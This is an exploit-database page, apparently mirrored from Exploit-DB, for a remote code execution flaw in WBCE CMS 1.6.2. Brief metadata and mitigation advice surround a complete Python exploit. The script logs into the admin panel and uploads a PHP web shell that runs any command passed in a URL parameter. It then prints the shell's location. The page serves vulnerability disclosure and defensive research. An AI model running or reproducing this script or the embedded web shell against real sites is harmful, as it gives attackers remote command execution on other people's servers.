header-logo
Suggest Exploit
vendor:
WBCE CMS
by:
Ahmet Ümit BAYRAM
8.1
CVSS
CRITICAL
Remote Code Execution (RCE)
94
CWE
Product Name: WBCE CMS
Affected Version From: 1.6.2002
Affected Version To: 1.6.2002
Patch Exists: NO
Related CWE: CVE-2024-XXXX (To be assigned)
CPE: a:wbce_cms:wbce_cms:1.6.2
Metasploit:
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/backupexec/ssl_uafhttps://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/
Platforms Tested: MacOS
2024

WBCE CMS v1.6.2 – Remote Code Execution (RCE)

The WBCE CMS version 1.6.2 allows remote attackers to execute arbitrary code via a crafted request. By uploading a malicious file, an attacker can execute commands on the server remotely.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version as soon as it is available. Avoid uploading files from untrusted sources.
Source

Exploit-DB raw data:

# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)
# Date: 3/5/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://wbce-cms.org/
# Software Link:
https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip
# Version: 1.6.2
# Tested on: MacOS

import requests
from bs4 import BeautifulSoup
import sys
import time

def login(url, username, password):
print("Logging in...")
time.sleep(3)
with requests.Session() as session:
response = session.get(url + "/admin/login/index.php")
soup = BeautifulSoup(response.text, 'html.parser')
form = soup.find('form', attrs={'name': 'login'})
form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in
form.find_all('input') if input_tag.get('type') != 'submit'}
# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle
form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =
username
form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =
password
post_response = session.post(url + "/admin/login/index.php", data=form_data)
if "Administration" in post_response.text:
print("Login successful!")
time.sleep(3)
return session
else:
print("Login failed.")
print("Headers received:", post_response.headers)
print("Response content:", post_response.text[:500]) # İlk 500 karakter
return None

def upload_file(session, url):
# Dosya içeriğini ve adını belirleyin
print("Shell preparing...")
time.sleep(3)
files = {'upload[]': ('shell.inc',"""<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>""", 'application/octet-stream')}
data = {
'reqid': '18f3a5c13d42c5',
'cmd': 'upload',
'target': 'l1_Lw',
'mtime[]': '1714669495'
}
response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",
files=files, data=data)
if response.status_code == 200:
print("Your Shell is Ready: " + url + "/media/shell.inc")
else:
print("Failed to upload file.")
print(response.text)

if __name__ == "__main__":
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
session = login(url, username, password)
if session:
upload_file(session, url)

Navigation

Suggest Exploit

Services By CQR